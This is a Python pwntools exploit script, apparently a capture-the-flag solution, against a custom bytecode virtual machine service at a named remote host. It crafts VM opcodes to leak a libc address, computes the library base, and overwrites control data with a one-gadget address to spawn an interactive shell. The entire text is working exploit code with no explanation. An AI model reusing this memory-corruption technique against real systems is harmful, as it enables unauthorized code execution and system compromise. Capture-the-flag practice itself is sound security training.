1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76
| from pwn import * from base64 import b64encode
def write_reg(reg1, reg2, imm): code = p8(1) code += p8(reg1) code += p8(reg2) code += p8(imm) return code
def load_reg(reg1, reg2, imm): code = p8(36) code += p8(reg1) code += p8(reg2) code += p8(imm) return code
def overwrite(reg, imm): code = p8(3) code += p8(0) code += p8(reg) code += p8(imm) return code
def leak(reg1, reg2, imm): code = p8(4) code += p8(reg1) code += p8(reg2) code += p8(imm) return code
def input_addr(size, reg, imm): code = p8(34) code += p8(size) code += p8(reg) code += p8(imm) return code
def output_addr(size, reg, imm): code = p8(33) code += p8(size) code += p8(reg) code += p8(imm) return code
def imm_to_reg(reg, imm): code = p8(6) code += p8(reg) code += p16(imm) return code
io = remote('gold.b01le.rs', 4003)
code = '' for i in range(0xfe): code += imm_to_reg(i+1, i+2) code += imm_to_reg(0xff, 0x800f) code += leak(8, 0xff, 0) for i in range(7): code += load_reg(i+1, 0xf, i) code += output_addr(6, 0xf, 0) code += input_addr(0x20, 0xf, 0) code += write_reg(2, 0xf, 0) code += write_reg(3, 0xf, 8) code += overwrite(0xf, 0x10) code += p32(0) code = b64encode(code)
io.sendlineafter('>> ', code) leak = u64(io.recv(6).ljust(8, '\x00')) - 0x10101010101 libc_base = leak - (0x7fbbbc6dc083 - 0x7fbbbc6b8000) one = libc_base + 0xe3b01 io.send(p64(one) + p64(0) + p64(0x5d) + p64(0x5e))
io.interactive()
|